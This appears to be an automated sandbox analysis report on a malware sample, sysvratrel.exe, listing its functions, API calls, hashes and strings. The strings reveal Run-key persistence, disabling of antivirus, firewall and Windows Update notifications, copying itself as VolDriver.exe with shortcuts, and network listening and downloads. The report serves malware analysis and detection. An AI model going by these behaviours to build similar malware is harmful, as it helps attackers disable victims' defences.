Instruction ID: e93cb10c30494a4e33d228fb1a439b2c2c35c7ccb48714dd22f79771c93e9d83
Opcode Fuzzy Hash: 7cf137ea0161487f7737358bd29a50fac6b28174b756953d330c0cbf6919b593
Instruction Fuzzy Hash: E921E5B11043016FC304DF65DC84A6BB7E9EF88314F004A3EF55592290E774DD4887EA

Uniqueness

Uniqueness Score: -1.00%

Function 00401F50 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON

Download Yara Rule

APIs

GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
WSAGetLastError.WS2_32 ref: 00401FB9
GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
String ID:
API String ID: 2074799992-0
Opcode ID: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
Instruction ID: 85cdc4ac02e7a7d961e62fa06f42dc9c3305788cd6d7a2bd32de2e1c20a60a18
Opcode Fuzzy Hash: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
Instruction Fuzzy Hash: DD212F715083159BC200DF55D884D5BB7E8BFCCB54F044A2EF59493291D734EA49CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00401C50 Relevance: 6.1, APIs: 4, Instructions: 59networksleepCOMMON

Download Yara Rule

APIs

WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Recv$ErrorLastSleep
String ID:
API String ID: 3668019968-0
Opcode ID: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
Instruction ID: df3cbe2ca7d05c2b70b960210cdf5b20c1916dde76b22b2cec88194eea221140
Opcode Fuzzy Hash: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
Instruction Fuzzy Hash: 6A11AD72148305AFD310CF65EC84AEBB7ECEB88710F40492AF945D2140E679E94997B6

Uniqueness

Uniqueness Score: -1.00%

Function 00401AE0 Relevance: 6.0, APIs: 4, Instructions: 49networksleepCOMMON

Download Yara Rule

APIs

WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
WSAGetLastError.WS2_32 ref: 00401B12
Sleep.KERNEL32(00000001), ref: 00401B28
WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Send$ErrorLastSleep
String ID:
API String ID: 2121970615-0
Opcode ID: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
Instruction ID: 6027246a5f20d5291fae036152240cd5c1f9414458335baedc5b4335fd2ad738
Opcode Fuzzy Hash: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
Instruction Fuzzy Hash: 8F014F712483046EE7209B96DC88F9B77A8EBC4711F508429F608961C0D7B5A9459B79

Uniqueness

Uniqueness Score: -1.00%

Function 0040D650 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 0040D669
CloseHandle.KERNEL32(?), ref: 0040D698
LeaveCriticalSection.KERNEL32(?), ref: 0040D6A7
DeleteCriticalSection.KERNEL32(?), ref: 0040D6B4

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: CriticalSection$CloseDeleteEnterHandleLeave
String ID:
API String ID: 3102160386-0
Opcode ID: 7bf4f18b4702a230417702d69d1d85fee5c3e33d7782737d8a2bd2494ce2794f
Instruction ID: fd906f08b3b88ca1f2a1246d33854d1cb2ade3c35c50db1fce3d72ba6cb97bf7
Opcode Fuzzy Hash: 7bf4f18b4702a230417702d69d1d85fee5c3e33d7782737d8a2bd2494ce2794f
Instruction Fuzzy Hash: 64115EB4D00208EBDB08DF94D984A9DB775FF44309F1085A9E80AA7341D739EE94DB85

Uniqueness

Uniqueness Score: -1.00%

Function 004017A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterExchangeInterlocked
String ID:
API String ID: 2223660684-0
Opcode ID: 998351d4031ac32c6d6d10c259f6772ab7bb4c14647e9de6e02c89c2d1c81f5d
Instruction ID: a0dc8c3c5f9b8335a8c68536f832427d4bfc411db9c79380583e721672fa548d
Opcode Fuzzy Hash: 998351d4031ac32c6d6d10c259f6772ab7bb4c14647e9de6e02c89c2d1c81f5d
Instruction Fuzzy Hash: 4F01F7792423009FC7209F26ED84A9B73E8AF45711F00043EE44693650DB39E401CB28

Uniqueness

Uniqueness Score: -1.00%

Function 00406F50 Relevance: 6.0, APIs: 4, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002,?,?,00407C66), ref: 00406F58
SysAllocString.OLEAUT32(00417280), ref: 00406F63
CoUninitialize.OLE32 ref: 00406F88

Part of subcall function 00406FA0: SysFreeString.OLEAUT32(00000000), ref: 004071B8

SysFreeString.OLEAUT32(00000000), ref: 00406F82

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: String$Free$AllocInitializeUninitialize
String ID:
API String ID: 459949847-0
Opcode ID: d37febddbfc04ccb5ddcd79972a62c48e1c377c34fe451ccbb6e607dda6765f2
Instruction ID: 8a6b4e1f6fa2c5cc19a61eea1a68b2ec0aac259eb3575b686c6209df8efe477e
Opcode Fuzzy Hash: d37febddbfc04ccb5ddcd79972a62c48e1c377c34fe451ccbb6e607dda6765f2
Instruction Fuzzy Hash: 98E092B4A40208FBD7009BE0ED0EB8D77349B05305F0040A4F90666291DAB95E80C755

Uniqueness

Uniqueness Score: -1.00%

Function 00406FA0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON

Download Yara Rule

APIs

Part of subcall function 00407230: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407250

SysFreeString.OLEAUT32(00000000), ref: 004071B8

Strings

Microsoft Corporation, xrefs: 00407126

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: CreateFreeInstanceString
String ID: Microsoft Corporation
API String ID: 586785272-3838278685
Opcode ID: e7592a1b6a7ca93a492843d129d0f5c494d0862bf32e99145538b4b10712f6f9
Instruction ID: b15f4297b17ed5f57f8313cde646c824d4e9e4ad422ceb8e026561d0ece074f1
Opcode Fuzzy Hash: e7592a1b6a7ca93a492843d129d0f5c494d0862bf32e99145538b4b10712f6f9
Instruction Fuzzy Hash: 9591FD75A0450ADFCB04DF94C894AAFB3B5BF49304F208169E515BB3E4D734AD42CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0040DBC0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 0040DE00: memset.NTDLL ref: 0040DE28
Part of subcall function 0040DE00: InternetCrackUrlA.WININET(0040D8D9,00000000,10000000,0000003C), ref: 0040DE78
Part of subcall function 0040DE00: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DE88
Part of subcall function 0040DE00: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DEC1
Part of subcall function 0040DE00: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DEF7
Part of subcall function 0040DE00: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DF1F
Part of subcall function 0040DE00: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DF68
Part of subcall function 0040DE00: InternetCloseHandle.WININET(00000000), ref: 0040DFF7

Part of subcall function 0040DCF0: SysAllocString.OLEAUT32(00000000), ref: 0040DD1E
Part of subcall function 0040DCF0: CoCreateInstance.OLE32(00412738,00000000,00004401,00412728,00000000), ref: 0040DD46
Part of subcall function 0040DCF0: SysFreeString.OLEAUT32(00000000), ref: 0040DDE1

SysFreeString.OLEAUT32(00000000), ref: 0040DC9B
SysFreeString.OLEAUT32(00000000), ref: 0040DCA5

Strings

%S%S, xrefs: 0040DC86

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
String ID: %S%S
API String ID: 1017111014-3267608656
Opcode ID: e90815c1511221caa1bb4232c4d734c08bee98e5bb0896a31ce96f10b80c8380
Instruction ID: 028390a8fa3b683b7bf8b6e952c0b4b0066608931571745b54bc663e5df7610f
Opcode Fuzzy Hash: e90815c1511221caa1bb4232c4d734c08bee98e5bb0896a31ce96f10b80c8380
Instruction Fuzzy Hash: 4C415BB5E002099FDB04DBE4C885AEFB7B5BF48304F104529E605B7390D778AA45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040D880 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002,?,?,?,00407C61), ref: 0040D88A

Part of subcall function 0040D950: socket.WS2_32(00000002,00000002,00000011), ref: 0040D96A
Part of subcall function 0040D950: htons.WS2_32(0000076C), ref: 0040D9A0
Part of subcall function 0040D950: inet_addr.WS2_32(239.255.255.250), ref: 0040D9AF
Part of subcall function 0040D950: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D9CD
Part of subcall function 0040D950: bind.WS2_32(000000FF,?,00000010), ref: 0040DA03
Part of subcall function 0040D950: lstrlenA.KERNEL32(00411A90,00000000,?,00000010), ref: 0040DA1C
Part of subcall function 0040D950: sendto.WS2_32(000000FF,00411A90,00000000), ref: 0040DA2B
Part of subcall function 0040D950: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DA45

Part of subcall function 0040DBC0: SysFreeString.OLEAUT32(00000000), ref: 0040DC9B
Part of subcall function 0040DBC0: SysFreeString.OLEAUT32(00000000), ref: 0040DCA5

Strings

UDP, xrefs: 0040D918
TCP, xrefs: 0040D8FB

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
String ID: TCP$UDP
API String ID: 1519345861-1097902612
Opcode ID: 23e2b161602aa368edb7d0b330d9f7272b4556a0a3daad279aa881e4cc12a6d8
Instruction ID: adc5519654865a9846dc14ee6574ade53ee5e8f68d7e54780b62f97b8647e200
Opcode Fuzzy Hash: 23e2b161602aa368edb7d0b330d9f7272b4556a0a3daad279aa881e4cc12a6d8
Instruction Fuzzy Hash: FE11AFB5E04208EBDB00EFD5EC45BAE7778EB44308F1088AAE510772C2E6785A54CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00405E50 Relevance: 5.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00416C40,?,?,?), ref: 00405E5F
memcpy.NTDLL(00000000,00000000,00000100), ref: 00405E9E
memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F13
LeaveCriticalSection.KERNEL32(00416C40), ref: 00405F30

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: CriticalSectionmemcpy$EnterLeave
String ID:
API String ID: 469056452-0
Opcode ID: 11253c93557e272cfa09b9ef5557470c866ee47475f0489080f61b160b652d5f
Instruction ID: d4c7a0d735d14698d69a5203b24d712139acd761569c954f121491256ddf65dc
Opcode Fuzzy Hash: 11253c93557e272cfa09b9ef5557470c866ee47475f0489080f61b160b652d5f
Instruction Fuzzy Hash: B8216B70A04208ABCB05DB94D885BDFB772EB44304F1481BAE84667281D67DAA85CF9A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: sysvratrel.exePID: 6196, Parent PID: 4004COMMON

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1447
Total number of Limit Nodes:	1

Executed Functions

Function 004074D0 Relevance: 208.8, APIs: 78, Strings: 41, Instructions: 569
sleepfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 004074DE
CreateMutexA.KERNELBASE(00000000,00000000,ax765638x6xa), ref: 004074ED
GetLastError.KERNEL32 ref: 004074F9
ExitProcess.KERNEL32 ref: 00407508
GetModuleFileNameW.KERNEL32(00000000,00417280,00000105), ref: 00407542
PathFindFileNameW.SHLWAPI(00417280), ref: 0040754D
wsprintfW.USER32 ref: 0040756A
DeleteFileW.KERNEL32(?), ref: 0040757A
ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407591
wcscmp.NTDLL ref: 004075A3
ExitProcess.KERNEL32 ref: 004075C2

Strings

%s\%s, xrefs: 0040769E
%s:Zone.Identifier, xrefs: 0040755E
SOFTWARE\Policies\Microsoft\Windows, xrefs: 004077F4
NoAutoUpdate, xrefs: 004078C3
FirewallDisableNotify, xrefs: 00407ADC
UpdatesDisableNotify, xrefs: 00407A6B
FirewallOverride, xrefs: 00407ABD
NoAutoUpdate, xrefs: 004077C2
Start, xrefs: 00407774
FirewallDisableNotify, xrefs: 004079D0
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate, xrefs: 0040784B
ax765638x6xa, xrefs: 004074E4
AntiVirusOverride, xrefs: 00407A0E
sysvratrel.exe, xrefs: 00407597, 004075DF, 00407692
%s\tbtcmds.dat, xrefs: 00407BE4
AntiSpywareOverride, xrefs: 00407AFB
%windir%, xrefs: 004075D4
FirewallOverride, xrefs: 004079B1
WindowsUpdate, xrefs: 0040781E
AntiVirusOverride, xrefs: 00407B1A
%userprofile%, xrefs: 0040758C
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00407635
AntiSpywareOverride, xrefs: 004079EF
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 004076E8
SOFTWARE\Microsoft\Security Center, xrefs: 0040798C
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU, xrefs: 004078A2
Start, xrefs: 00407911
%s\%s, xrefs: 004075EB
UpdatesDisableNotify, xrefs: 00407B77
AntiVirusDisableNotify, xrefs: 00407B39
AntiVirusDisableNotify, xrefs: 00407A2D
%s\tbtnds.dat, xrefs: 00407BCA
Windows Settings, xrefs: 00407668, 0040771B
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL, xrefs: 0040793E
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU, xrefs: 004077A1
UpdatesOverride, xrefs: 00407B58
SOFTWARE\Microsoft\Security Center\Svc, xrefs: 00407A98
UpdatesOverride, xrefs: 00407A4C
SYSTEM\CurrentControlSet\Services\wuauserv, xrefs: 00407753
SYSTEM\CurrentControlSet\Services\BITS, xrefs: 004078F0
CheckedValue, xrefs: 0040795F

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%userprofile%$%windir%$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$CheckedValue$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$NoAutoUpdate$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$WindowsUpdate$ax765638x6xa$sysvratrel.exe
API String ID: 4172876685-1985754541
Opcode ID: 02b0754e67c3a5fcf2013b17b005cb8467541e175cb8f0ff015428280e5330c7
Instruction ID: 01c652a6eea3614599500b2dbdc2b26867472a33c88adbc755e5585b16fefd61
Opcode Fuzzy Hash: 02b0754e67c3a5fcf2013b17b005cb8467541e175cb8f0ff015428280e5330c7
Instruction Fuzzy Hash: 582275B1B80318BBE7209B90DC4AFE97775AB4CB05F5080A9B305BA1D1D6F4A984CF5D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00406650 Relevance: 73.8, APIs: 32, Strings: 10, Instructions: 293
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_chkstk.NTDLL(?,00406CA0,?,?,?), ref: 00406658
wsprintfW.USER32 ref: 0040668F
wsprintfW.USER32 ref: 004066AF
wsprintfW.USER32 ref: 004066CF
wsprintfW.USER32 ref: 004066EF
wsprintfW.USER32 ref: 00406708
PathFileExistsW.SHLWAPI(?), ref: 00406718
SetFileAttributesW.KERNEL32(?,00000080), ref: 00406751
DeleteFileW.KERNEL32(?), ref: 0040675E
PathFileExistsW.SHLWAPI(?), ref: 0040676B
PathFileExistsW.SHLWAPI(?), ref: 0040677C
CreateDirectoryW.KERNEL32(?,00000000), ref: 0040678F
SetFileAttributesW.KERNEL32(?,00000002), ref: 004067A2
PathFileExistsW.SHLWAPI(?), ref: 004067AF
CopyFileW.KERNEL32(00416C68,?,00000000), ref: 004067C7
SetFileAttributesW.KERNEL32(?,00000002), ref: 004067DA

Strings

%s\%s, xrefs: 00406A0E
%s\%s, xrefs: 00406A81
%s\*, xrefs: 004066FC
%s\%s, xrefs: 004066E3
shell32.dll, xrefs: 004067FB
%s\%s\VolDriver.exe, xrefs: 004066C3
shell32.dll, xrefs: 00406813
%s\%s\%s, xrefs: 00406AA8
%s\%s, xrefs: 004066A3
%s.lnk, xrefs: 00406683

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: File$wsprintf$ExistsPath$Attributes$CopyCreateDeleteDirectory_chkstk
String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolDriver.exe$%s\*$shell32.dll$shell32.dll
API String ID: 3833403615-1812021906
Opcode ID: 51569e4564f7ad71e9d56f202160bdb96e67f6a8183d4c5cf6e4c163dce801ad
Instruction ID: e2ecd58a7cdb3ddabc66963e241761916e5e8b01b4df26f84105cefa3cc8d735
Opcode Fuzzy Hash: 51569e4564f7ad71e9d56f202160bdb96e67f6a8183d4c5cf6e4c163dce801ad
Instruction Fuzzy Hash: 33D17475900258ABCB20DF60DD44FEA77B8BB48704F00C5E9F20AA6191D7B99BD4CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00406510 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 85
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNEL32(00406ADB,00000000), ref: 0040651F
wsprintfW.USER32 ref: 00406535
FindFirstFileW.KERNEL32(?,?), ref: 0040654C
lstrcmpW.KERNEL32(?,00410FEC), ref: 00406571
lstrcmpW.KERNEL32(?,00410FF0), ref: 00406587
wsprintfW.USER32 ref: 004065AA
wsprintfW.USER32 ref: 004065CA
MoveFileExW.KERNEL32(?,?,00000009), ref: 00406606
FindNextFileW.KERNEL32(000000FF,?), ref: 0040661A
FindClose.KERNEL32(000000FF), ref: 0040662F
RemoveDirectoryW.KERNEL32(?), ref: 00406639

Strings

%s\*, xrefs: 00406529
%s\%s, xrefs: 004065BE
%s\%s, xrefs: 0040659E

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
String ID: %s\%s$%s\%s$%s\*
API String ID: 92872011-445461498
Opcode ID: fff228176ed4e70ddfe54118d53eb9c7a4e211142d687289bb598ae5de3d6162
Instruction ID: 675ada4a5424986e6cd9ec47b4399dcfcf89a647db31862166f89cf1cb76b4cd
Opcode Fuzzy Hash: fff228176ed4e70ddfe54118d53eb9c7a4e211142d687289bb598ae5de3d6162
Instruction Fuzzy Hash: E33178B5900218AFCB10DB60EC89FDA7778AB48301F00C5A9F609A3185DB75DAD9CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00402020 Relevance: 16.6, APIs: 11, Instructions: 131networkCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?), ref: 00402043
InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E

Part of subcall function 0040D370: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D38E

WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
setsockopt.WS2_32 ref: 004020D1
htons.WS2_32(?), ref: 00402101
bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
listen.WS2_32(?,7FFFFFFF), ref: 0040212F
WSACreateEvent.WS2_32 ref: 0040213A
WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E

Part of subcall function 0040D3A0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D3C4
Part of subcall function 0040D3A0: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D41F
Part of subcall function 0040D3A0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D45C
Part of subcall function 0040D3A0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D467
Part of subcall function 0040D3A0: DuplicateHandle.KERNEL32(00000000), ref: 0040D46E
Part of subcall function 0040D3A0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D482

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

